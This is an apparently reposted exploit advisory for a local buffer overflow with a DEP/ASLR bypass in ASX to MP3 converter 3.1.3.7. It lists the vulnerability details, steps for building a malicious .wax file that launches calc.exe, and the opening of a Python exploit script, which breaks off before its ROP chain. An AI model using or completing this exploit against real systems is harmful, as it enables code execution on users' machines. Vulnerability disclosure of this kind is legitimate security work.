ASX to MP3 converter 3.1.3.7.2010.11.05 – ‘.wax’ Local Buffer Overflow (DEP,ASLR Bypass) (PoC) – Digitalmunition




Exploit/Advisories 1597662358_spider-orange.png

Published on August 28th, 2020 📆 | 1783 Views ⚑

0

ASX to MP3 converter 3.1.3.7.2010.11.05 – ‘.wax’ Local Buffer Overflow (DEP,ASLR Bypass) (PoC)

# Exploit Title: ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP,ASLR Bypass) (PoC) 
# Software Link Download: https://github.com/x00x00x00x00/ASXtoMP3Converter_3.1.3.7.2010.11.05/blob/master/ASXtoMP3Converter_3.1.3.7.2010.11.05.exe?raw=true
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-08-25
# Vulnerable Software: ASX to MP3 converter
# Version: 3.1.3.7.2010.11.05
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  

# Proof of Concept :

#   1.- Run python code: asx_to_mp3_rop_exploit.py
#   2.- Works on DEP enabled for ASX2MP3Converter.exe
#   3.- Open "ASX2MP3Converter.exe"
#   4.- Click on "Load" Button 
#   5.- Select generated file "asx_to_mp3_rop_exploit.wax".
#   6.- Click on "Open".
#   7.- Calc.exe runs.


#################################################################################################################################################

#Python "asx_to_mp3_rop_exploit.py" Code:

import struct
file = 'asx_to_mp3_rop_exploit.wax'


payload = "http://"
payload += "A" * 17417 + struct.pack('

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...